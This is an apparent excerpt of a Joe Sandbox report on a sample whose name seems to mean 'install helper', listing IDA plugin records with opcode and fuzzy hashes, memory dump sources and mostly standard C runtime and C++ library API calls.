                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                                                            • Instruction ID: 9f1b87328fad328fa10a8cee966eab348f6f25538d823be1cb1d95c5149dbdc6
                                                            • Opcode Fuzzy Hash: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                                                            • Instruction Fuzzy Hash: 393114277A440113C70CC92BCD6679F91935BD422A70ECF396845DAF55E92CC8124145
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2e506fc7279a820970dcbf9ac392f20d839b71f7c0b8c4e9d2c3673edf14b0ee
                                                            • Instruction ID: a507180319329df45f87e7b8322bb6e53282a051076b19b1062db3c65154eb43
                                                            • Opcode Fuzzy Hash: 2e506fc7279a820970dcbf9ac392f20d839b71f7c0b8c4e9d2c3673edf14b0ee
                                                            • Instruction Fuzzy Hash: 7031EB73704A050EF311862AC9853567223EBC37A8F69C76DD96687EECFA7198478183
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 69d074c34a2def6d804bdbc3328af019823b1a6a4464c67451b70719eeaddbc9
                                                            • Instruction ID: a851cd14f50bf4377390c7ea7e27388aa31a88b8ba0782c6cdf08b288da73bbb
                                                            • Opcode Fuzzy Hash: 69d074c34a2def6d804bdbc3328af019823b1a6a4464c67451b70719eeaddbc9
                                                            • Instruction Fuzzy Hash: 5741A3B2904B068BD704DF19C89056AB3E4FF88318F454A6DEE5AE7381E331FA55CB91
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d2e9eb99358111aa00ddd4771d36b21c13931b70b848b90c87e332bda565fdca
                                                            • Instruction ID: ed28857a6d5769129a561262bff769749f6250392e8674f4d08eb67c6ff42237
                                                            • Opcode Fuzzy Hash: d2e9eb99358111aa00ddd4771d36b21c13931b70b848b90c87e332bda565fdca
                                                            • Instruction Fuzzy Hash: 11214BB1A047E607E720DE6ECCC037577D39BC6305F094279D9608F647E1798892D6A0
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8dd244edcb321eb0178bb45a471bfe52d7ad1ac8c6226807032c761fbe5904b9
                                                            • Instruction ID: 052131a034e96885a82893bcb580781f61fdb0b42b2791c4fe7ac55eeea62de9
                                                            • Opcode Fuzzy Hash: 8dd244edcb321eb0178bb45a471bfe52d7ad1ac8c6226807032c761fbe5904b9
                                                            • Instruction Fuzzy Hash: E1F03032A15224DBEB12DB4CD405B8973BCEB45B65F110496E505DB650E7B8DD40D7D0
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                                                            • Instruction ID: dfaa65b188daac0c0d320b6b829517e4cd39d1262cee7ad7241bc01ec009e29f
                                                            • Opcode Fuzzy Hash: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                                                            • Instruction Fuzzy Hash: 64E08C72A12238EBCB15EB98C940D8AB3ECEB44E05F1100D6F501D3610E274DE00D7D0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                                                            • API String ID: 3519838083-609671
                                                            • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                                            • Instruction ID: 239a9dbb8b7f52d8b9ab89b6dfcef71eb36ce7b443db22a5b17fd1f9b86e0c60
                                                            • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                                            • Instruction Fuzzy Hash: 20D17F72A04209DFCB21CFA4D990BEEB7B5FF45308F24855DE055A3A50EB70A949CBB4
                                                            APIs
                                                            • _ValidateLocalCookies.LIBCMT ref: 6CC19B07
                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 6CC19B0F
                                                            • _ValidateLocalCookies.LIBCMT ref: 6CC19B98
                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 6CC19BC3
                                                            • _ValidateLocalCookies.LIBCMT ref: 6CC19C18
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                            • String ID: csm
                                                            • API String ID: 1170836740-1018135373
                                                            • Opcode ID: de8180a306f2c556f0732680e2a883da7975a2e9ae0bf263e8aaa26a24ec5007
                                                            • Instruction ID: 9e487191128f410faebc5a45cca9a14753c14290978e5bc36b368ad12c374dbd
                                                            • Opcode Fuzzy Hash: de8180a306f2c556f0732680e2a883da7975a2e9ae0bf263e8aaa26a24ec5007
                                                            • Instruction Fuzzy Hash: AC41E534A142189FCF10DF6AC880ADEBBB5FF46318F148155E8189BF91E735DA49CB90
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: api-ms-$ext-ms-
                                                            • API String ID: 0-537541572
                                                            • Opcode ID: 7335cf618050b27182bfc71087ea3472cd77399268a43f6753ce086f8331ba49
                                                            • Instruction ID: a7d3ee99ef9f7e316ec9a66d2e7fef5f0c4d052a7c9c904edb0729f092bc567b
                                                            • Opcode Fuzzy Hash: 7335cf618050b27182bfc71087ea3472cd77399268a43f6753ce086f8331ba49
                                                            • Instruction Fuzzy Hash: A221D532E16A21ABDF318B698C40B4A37B8AB06768F354651E915E7A80F778DD0186F0
                                                            APIs
                                                            • GetConsoleCP.KERNEL32(?,6CC2B0D0,?), ref: 6CC2BEF9
                                                            • __fassign.LIBCMT ref: 6CC2C0D8
                                                            • __fassign.LIBCMT ref: 6CC2C0F5
                                                            • WriteFile.KERNEL32(?,6CC35AB6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CC2C13D
                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CC2C17D
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CC2C229
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: FileWrite__fassign$ConsoleErrorLast
                                                            • String ID:
                                                            • API String ID: 4031098158-0
                                                            • Opcode ID: 631ab58d3484f0f3a6d6e29184fc90e09bfa7e6edbaecfe722fa91f2b27fca78
                                                            • Instruction ID: 68456bfab203958e4b2610cf0636a493a0346164117b476f556abcbca6264c40
                                                            • Opcode Fuzzy Hash: 631ab58d3484f0f3a6d6e29184fc90e09bfa7e6edbaecfe722fa91f2b27fca78
                                                            • Instruction Fuzzy Hash: F9D1A875E002989FEF15CFE8C8809EDBBB5BF09314F28416AE855FB641E735A906CB50
                                                            APIs
                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6CAE2F95
                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6CAE2FAF
                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6CAE2FD0
                                                            • __Getctype.LIBCPMT ref: 6CAE3084
                                                            • std::_Facet_Register.LIBCPMT ref: 6CAE309C
                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6CAE30B7
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                            • String ID:
                                                            • API String ID: 1102183713-0
                                                            • Opcode ID: 3f2a8d4b43d86e1c55789f54b2ac02f24c3932bc5bb005739f25da21cca657e8
                                                            • Instruction ID: da0d06f5bf1da7fbf883113a0d47dd783085181d6e30d374d2b3001d969f7547
                                                            • Opcode Fuzzy Hash: 3f2a8d4b43d86e1c55789f54b2ac02f24c3932bc5bb005739f25da21cca657e8
                                                            • Instruction Fuzzy Hash: E64188B1E046548FDB10CF85D851B9EB7B4FF48728F088218D959ABB50EB30A945CBD0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: __aulldiv$__aullrem
                                                            • String ID:
                                                            • API String ID: 2022606265-0
                                                            • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                                            • Instruction ID: b93657d9ee16e7ee7b83b60bd0d01d2689088cf9f40671aab8d307c5e9ea1cea
                                                            • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                                            • Instruction Fuzzy Hash: 2721DD31900219FFDF208E949C40DCF7E69EF863A8F608226F521616D0F2718E71D7A5
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 6CC5A6F1
                                                              • Part of subcall function 6CC69173: __EH_prolog.LIBCMT ref: 6CC69178
                                                            • __EH_prolog.LIBCMT ref: 6CC5A8F9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: IJ$WIJ$J
                                                            • API String ID: 3519838083-740443243
                                                            • Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                                            • Instruction ID: 6133b6a9b09cadac8b384c5858f799cd36aca437d08712531d1b7e722281076d
                                                            • Opcode Fuzzy Hash: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                                            • Instruction Fuzzy Hash: E071F130904655DFCB14CFA5C480BEDB7F0BF54308F5080A9D959ABB82EB74BA19CBA4
                                                            APIs
                                                            • _free.LIBCMT ref: 6CC35ADD
                                                            • _free.LIBCMT ref: 6CC35B06
                                                            • SetEndOfFile.KERNEL32(00000000,6CC346EC,00000000,6CC2B0D0,?,?,?,?,?,?,?,6CC346EC,6CC2B0D0,00000000), ref: 6CC35B38
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CC346EC,6CC2B0D0,00000000,?,?,?,?,00000000,?), ref: 6CC35B54
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFileLast
                                                            • String ID: 8Q
                                                            • API String ID: 1547350101-4022487301
                                                            • Opcode ID: 2e8377c20c227c13120c260d12b54bc668d7333e5802c9bb0bf1f24529f51046
                                                            • Instruction ID: d31469795f2f66f6030806b1f7f4638ab48acab53a7ded8c4cea92c841e4c383
                                                            • Opcode Fuzzy Hash: 2e8377c20c227c13120c260d12b54bc668d7333e5802c9bb0bf1f24529f51046
                                                            • Instruction Fuzzy Hash: C441C732A00655AFDB019BB9EC81BDE3B75AF45328F242511E428E7B90FB35C8859760
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 6CC6E41D
                                                              • Part of subcall function 6CC6EE40: __EH_prolog.LIBCMT ref: 6CC6EE45
                                                              • Part of subcall function 6CC6E8EB: __EH_prolog.LIBCMT ref: 6CC6E8F0
                                                              • Part of subcall function 6CC6E593: __EH_prolog.LIBCMT ref: 6CC6E598
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: &qB$0aJ$A0$XqB
                                                            • API String ID: 3519838083-1326096578
                                                            • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                                            • Instruction ID: 3d0b4521f584ce0780188e75a22061e55ec5a7b52aa2eda5869fc096ac7d8784
                                                            • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                                            • Instruction Fuzzy Hash: 30218E71D01258EACB04DBE5DA949EDBBB4AF15318F50802EE41577B81EB784E0CCB51
                                                            APIs
                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CC1F1B4,00000000,?,6CC1F235,6CC19C49,00000003,00000000), ref: 6CC1F13F
                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CC1F152
                                                            • FreeLibrary.KERNEL32(00000000,?,?,6CC1F1B4,00000000,?,6CC1F235,6CC19C49,00000003,00000000), ref: 6CC1F175
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: 02d24c2fc0f57c2c6d62d6cd76764190afed15723ac347d8fe6a9160ea50a640
                                                            • Instruction ID: 7e08af0c9fe239c70ff415dd1ced8f8c1143fb93d7afb6b6582cd188c9d9a33c
                                                            • Opcode Fuzzy Hash: 02d24c2fc0f57c2c6d62d6cd76764190afed15723ac347d8fe6a9160ea50a640
                                                            • Instruction Fuzzy Hash: 7FF08C31A01518FBDF02EF91C809B9E7A78EB0536AF348060E801E2850EB708A01EAA0
                                                            APIs
                                                            • __EH_prolog3.LIBCMT ref: 6CC1732E
                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 6CC17339
                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6CC173A7
                                                              • Part of subcall function 6CC17230: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6CC17248
                                                            • std::locale::_Setgloballocale.LIBCPMT ref: 6CC17354
                                                            • _Yarn.LIBCPMT ref: 6CC1736A
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2327639298.000000006CA91000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA90000, based on PE: true
                                                            • Associated: 00000006.00000002.2327616013.000000006CA90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328885964.000000006CC38000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2330583795.000000006CE02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                            • String ID:
                                                            • API String ID: 1088826258-0
                                                            • Opcode ID: 0988695e90d4e0170d93b62e6c47ca41b3eb87d887a006fb89267861ab914afc
                                                            • Instruction ID: 3a5dd73bfb45ecd48df55f09e36c6f59d91bc79563517e16c7479895d345ea04
                                                            • Opcode Fuzzy Hash: 0988695e90d4e0170d93b62e6c47ca41b3eb87d887a006fb89267861ab914afc
                                                            • Instruction Fuzzy Hash: 1101DF756085209FDB05EF61C841ABC37B5FF86258B154009D90197F80EF34AA47EFD1
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID: $!$@
                                                            • API String ID: 3519838083-2517134481
                                                            • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                                            • Instruction ID: 5d4803d23cd70038e5cd01fb5db85d7a1b81b9fe6c0aabdaf88a946f4c78c755
                                                            • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                                                            • Instruction Fuzzy Hash: A0128D70E16649DFCF04CFA4C5D0ADDBBB1BF09308F14846AE845ABB51EB31A955CBA0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2328973032.000000006CC48000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CC48000, based on PE: true
                                                            • Associated: 00000006.00000002.2329658148.000000006CD13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000006.00000002.2329694084.000000006CD19000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6ca90000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                            Similarity
                                                            • API ID: H_prolog__aulldiv
                                                            • String ID: $SJ
                                                            • API String ID: 4125985754-3948962906
                                                            • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                                            • Instruction ID: 9b63b46e7e4638f3a98de9b33b3f1f4adb5596a34a047585628e80cd3cf0a32d
                                                            • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                                                            • Instruction Fuzzy Hash: 93B16DB1D002099FDB14CFA6CAD49AEBBB1FF48318B20856ED556A7B50E730AA45CB50
                                                            APIs
                                                              • Part of subcall function 6CC17327: __EH_prolog3.LIBCMT ref: 6CC1732E
                                                              • Part of subcall function 6CC17327: std::_Lockit::_Lockit.LIBCPMT ref: 6CC17339
                                                              • Part of subcall function 6CC17327: std::locale::_Setgloballocale.LIBCPMT ref: 6CC17354
                                                              • Part of subcall function 6CC17327: _Yarn.LIBCPMT ref: 6CC1736A
                                                              • Part of subcall function 6CC17327: std::_Lockit::~_Lockit.LIBCPMT ref: 6CC173A7
                                                              • Part of subcall function 6CAE2F60: std::_Lockit::_Lockit.LIBCPMT ref: 6CAE2F95
                                                              • Part of subcall function 6CAE2F60: std::_Lockit::_Lockit.LIBCPMT ref: 6CAE2FAF
                                                              • Part of subcall function 6CAE2F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6CAE2FD0
                                                              • Part of subcall function 6CAE2F60: __Getctype.LIBCPMT ref: 6CAE3084
                                                              • Part of subcall function 6CAE2F60: std::_Facet_Register.LIBCPMT ref: 6CAE309C
                                                              • Part of subcall function 6CAE2F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6CAE30B7
